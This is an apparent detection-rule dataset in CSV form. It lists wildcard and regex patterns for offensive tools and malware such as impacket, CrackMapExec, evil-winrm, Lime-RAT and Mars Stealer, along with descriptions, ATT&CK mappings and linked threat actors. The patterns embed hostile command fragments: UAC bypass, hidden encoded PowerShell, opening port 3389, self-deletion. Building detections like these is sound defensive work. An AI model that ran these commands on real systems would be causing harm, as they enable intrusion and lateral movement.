"*cloudsploit *",".{0,1000}cloudsploit\s.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","N/A","10","3498","702","2025-03-20T12:01:19Z","2015-06-29T15:33:40Z","38379"
"*cloudsploit*cloudtrail*",".{0,1000}cloudsploit.{0,1000}cloudtrail.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","N/A","10","3498","702","2025-03-20T12:01:19Z","2015-06-29T15:33:40Z","38380"
"*cloudsploit/index.js*",".{0,1000}cloudsploit\/index\.js.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","N/A","10","3498","702","2025-03-20T12:01:19Z","2015-06-29T15:33:40Z","38381"
"*cloudsploit/scans*",".{0,1000}cloudsploit\/scans.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","N/A","10","3498","702","2025-03-20T12:01:19Z","2015-06-29T15:33:40Z","38382"
"*CloudSploitSupplemental*",".{0,1000}CloudSploitSupplemental.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","N/A","10","3498","702","2025-03-20T12:01:19Z","2015-06-29T15:33:40Z","38383"
"*cloudtrail__csv_injection*",".{0,1000}cloudtrail__csv_injection.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","38384"
"*clr2of8/DPAT*",".{0,1000}clr2of8\/DPAT.{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","1","N/A","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","38385"
"*clr2of8/GatherContacts*",".{0,1000}clr2of8\/GatherContacts.{0,1000}","offensive_tool_keyword","GatherContacts","A Burp Suite Extension to pull Employee Names from Google and Bing LinkedIn Search Results.As part of reconnaissance when performing a penetration test. it is often useful to gather employee names that can then be massaged into email addresses and usernames. The usernames may come in handy for performing a password spraying attack for example. One easy way to gather employee names is to use the following Burp Suite Pro extension as described below.","T1593 - T1533 - T1087","TA0043 - TA0002","N/A","N/A","Reconnaissance","https://github.com/clr2of8/GatherContacts","1","1","N/A","N/A","N/A","2","193","44","2024-07-06T09:18:54Z","2018-03-29T14:46:14Z","38386"
"*cmars/onionpipe*",".{0,1000}cmars\/onionpipe.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","38388"
"*cmbndhnoonmghfofefkcccljbkdpamhi_14678.crx*",".{0,1000}cmbndhnoonmghfofefkcccljbkdpamhi_14678\.crx.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/LasCC/Hack-Tools","1","1","N/A","N/A","9","10","6045","678","2025-01-05T23:10:49Z","2020-06-22T21:42:16Z","38389"
"*cmd /c * --bypass-uac*",".{0,1000}cmd\s\/c\s.{0,1000}\s\-\-bypass\-uac.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","38394"
"*cmd /c * --remote-impersonation*",".{0,1000}cmd\s\/c\s.{0,1000}\s\-\-remote\-impersonation.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","38395"
"*cmd /c *if exist *.txt echo ImHere*",".{0,1000}cmd\s\/c\s.{0,1000}if\sexist\s.{0,1000}\.txt\secho\sImHere.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","38396"
"*cmd /c mklink /d * HarddiskVolumeShadowCopy1*",".{0,1000}cmd\s\/c\smklink\s\/d\s.{0,1000}\sHarddiskVolumeShadowCopy1.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","38399"
"*cmd /c ping localhost -n 1""*",".{0,1000}cmd\s\/c\sping\slocalhost\s\-n\s1\"".{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","38400"
"*cmd /c powershell -windowst hidden *",".{0,1000}cmd\s\/c\spowershell\s\-windowst\shidden\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","typo","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","38401"
"*cmd /c start https://github.com/trustedsec/specula/*",".{0,1000}cmd\s\/c\sstart\shttps\:\/\/github\.com\/trustedsec\/specula\/.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","38406"
"*cmd /c whoami* bypass*",".{0,1000}cmd\s\/c\swhoami.{0,1000}\sbypass.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","38408"
"*cmd smb *-u*-p*",".{0,1000}cmd\ssmb\s.{0,1000}\-u.{0,1000}\-p.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38410"
"*cmd.cat/chattr*",".{0,1000}cmd\.cat\/chattr.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","38413"
"*cmd.exe /c ""OK!""*",".{0,1000}cmd\.exe\s\/c\s\""OK!\"".{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","N/A","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","38415"
"*cmd.exe /c *echo test > C:\Users\Public\test.txt*",".{0,1000}cmd\.exe\s\/c\s.{0,1000}echo\stest\s\>\sC\:\\Users\\Public\\test\.txt.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/frkngksl/NimExec","1","0","N/A","N/A","N/A","4","372","38","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z","38416"
"*cmd.exe /c C:\\Windows\\DiskSnapShot.exe && echo --path C:\\Windows\\CCMCache\\cache*",".{0,1000}cmd\.exe\s\/c\sC\:\\\\Windows\\\\DiskSnapShot\.exe\s\&\&\secho\s\-\-path\sC\:\\\\Windows\\\\CCMCache\\\\cache.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","0","N/A","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","38418"
"*cmd.exe /c netsh advfirewall firewall add rule name=* protocol=TCP dir=in localport=3389 action=allow*",".{0,1000}cmd\.exe\s\/c\snetsh\sadvfirewall\sfirewall\sadd\srule\sname\=.{0,1000}\sprotocol\=TCP\sdir\=in\slocalport\=3389\saction\=allow.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","38424"
"*cmd.exe /c ping 0 -n 2 & del *",".{0,1000}cmd\.exe\s\/c\sping\s0\s\-n\s2\s\&\sdel\s.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","38425"
"*cmd.exe /c powershell -command ""Get-Service *chopper*",".{0,1000}cmd\.exe\s\/c\spowershell\s\-command\s\""Get\-Service\s.{0,1000}chopper.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","38426"
"*cmd.exe /c powershell.exe -enc $b64ClientScript*",".{0,1000}cmd\.exe\s\/c\spowershell\.exe\s\-enc\s\$b64ClientScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","38427"
"*cmd.exe /c powershell.exe -enc $B64ServerScript*",".{0,1000}cmd\.exe\s\/c\spowershell\.exe\s\-enc\s\$B64ServerScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","38428"
"*cmd.exe /c rundll32.exe agressor.dll*stealth*",".{0,1000}cmd\.exe\s\/c\srundll32\.exe\sagressor\.dll.{0,1000}stealth.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","38430"
"*cmd.exe /c sc start plumber*",".{0,1000}cmd\.exe\s\/c\ssc\sstart\splumber.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","38431"
"*cmd.exe /C tasklist /m > C:\Windows\Temp\*.tmp 2>&1*",".{0,1000}cmd\.exe\s\/C\stasklist\s\/m\s\>\sC\:\\Windows\\Temp\\.{0,1000}\.tmp\s2\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","observed with wmiexec.py","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38434"
"*cmd.exe /c timeout /t 5 & del /f /q *%s* & exit*",".{0,1000}cmd\.exe\s\/c\stimeout\s\/t\s5\s\&\sdel\s\/f\s\/q\s.{0,1000}\%s.{0,1000}\s\&\sexit.{0,1000}","offensive_tool_keyword","mars stealer","Self-removal 'mars stealer' command","T1587","TA0002","mars stealer","N/A","Malware","https://3xp0rt.com/posts/mars-stealer","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38435"
"*cmd.exe /c zoom1.msi*",".{0,1000}cmd\.exe\s\/c\szoom1\.msi.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tool","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","38437"
"*cmd.exe /Q /c * 1> *\\127.0.0.1\ADMIN$\__* 2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\s.{0,1000}\s1\>\s.{0,1000}\\\\127\.0\.0\.1\\ADMIN\$\\__.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","generic behavior of impacket command execution","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38438"
"*cmd.exe /Q /c *.bat *> \\127.0.0.1\ADMIN$\* 2&*",".{0,1000}cmd\.exe\s\/Q\s\/c\s.{0,1000}\.bat\s.{0,1000}\>\s\\\\127\.0\.0\.1\\ADMIN\$\\.{0,1000}\s2\&.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38439"
"*cmd.exe /Q /c /start /min powershell.exe -nop -c*",".{0,1000}cmd\.exe\s\/Q\s\/c\s\/start\s\/min\spowershell\.exe\s\-nop\s\-c.{0,1000}","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38440"
"*cmd.exe /Q /c cd  1> \\127.0.0.1\ADMIN$\_*>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\scd\s\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\_.{0,1000}\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","observed with wmiexec.py","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38441"
"*cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__* 2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\scd\s\\\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\__.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38442"
"*cmd.exe /Q /c dir 1> \\127.0.0.1\ADMIN$\_* 2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\sdir\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\_.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","38444"
"*cmd.exe /Q /c dir 1> \\localhost\ADMIN$\Temp\* 2>&1*",".{0,1000}cmd\.exe\s\/Q\s\/c\sdir\s1\>\s\\\\localhost\\ADMIN\$\\Temp\\.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","38445"
"*cmd.exe /Q /c echo tasklist ^> \\127.0.0.1\C$\__*2^>^&1 > *",".{0,1000}cmd\.exe\s\/Q\s\/c\secho\stasklist\s\^\>\s\\\\127\.0\.0\.1\\C\$\\__.{0,1000}2\^\>\^\&1\s\>\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","observed with smbexec.py","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38446"
